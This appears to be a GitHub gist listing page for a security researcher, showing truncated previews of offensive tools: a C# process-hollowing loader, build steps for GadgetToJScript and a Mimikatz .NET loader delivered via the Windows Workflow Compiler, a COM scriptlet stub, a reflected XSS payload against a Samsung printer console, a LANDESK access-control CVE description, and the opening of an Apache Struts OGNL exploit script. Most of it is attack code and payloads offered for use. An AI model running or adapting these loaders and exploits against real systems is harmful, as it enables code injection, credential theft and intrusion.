Skip to content

Instantly share code, notes, and snippets.

Avatar

Mohamed El Azaar med0x2e

View GitHub Profile
@med0x2e
med0x2e / process-hollowing.cs
Last active Mar 28, 2021
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
View process-hollowing.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@med0x2e
med0x2e / steps.txt
Last active Apr 16, 2021
Steps to run GadgetToJScript on linux (wine)
View steps.txt
Steps:
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
View Steps.txt
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.
4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.
6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
View gist:2715d32602ba688ea3bc239a3d5f8214
[Suggested description]
Samsung printer model "SCX-824" web console is vulnerable to
a reflected Cross-Site-Scripting (XSS) vulnerability which can be
triggered by using "print from file" feature which forward the
user to the following URL:
"http://<PRINTER_IP>/sws/swsAlert.sws?popupid=successMsg&type=alert&bullet=suc&func=&Nfunc=closePopup("successMsg","","")&flag=&frame=&msg="/><script>alert('XSS');</script>
The vulnerable parameter "msg" is not properly encoded before interepred as HTML/JS.
------------------------------------------
View sct.png
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
@med0x2e
med0x2e / compiler-input-obj.xml
Last active Aug 28, 2018
CompilerInput Object
View compiler-input-obj.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>result.xml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">
<d3p1:anyType xmlns:d4p1="http://www.w3.org/2001/XMLSchema" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
</assemblyNames>
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@med0x2e
med0x2e / katz.whatever
Last active Apr 30, 2021
Mimikatz .NET Loader
View katz.whatever
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;
public class KatzWFCompiler : SequentialWorkflowActivity
{
public KatzWFCompiler()
@med0x2e
med0x2e / CVE-2017-11463
Last active Dec 15, 2017
CVE-2017-11463
View CVE-2017-11463
[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference leads to referencing/updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in an HTTP payload in order to retrieve a
key/token and use it to access/update objects belonging to other
users. Such objects could be user profiles, tickets, incidents, etc.
------------------------------------------
[Additional Information]
View struts0Exploit.py
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."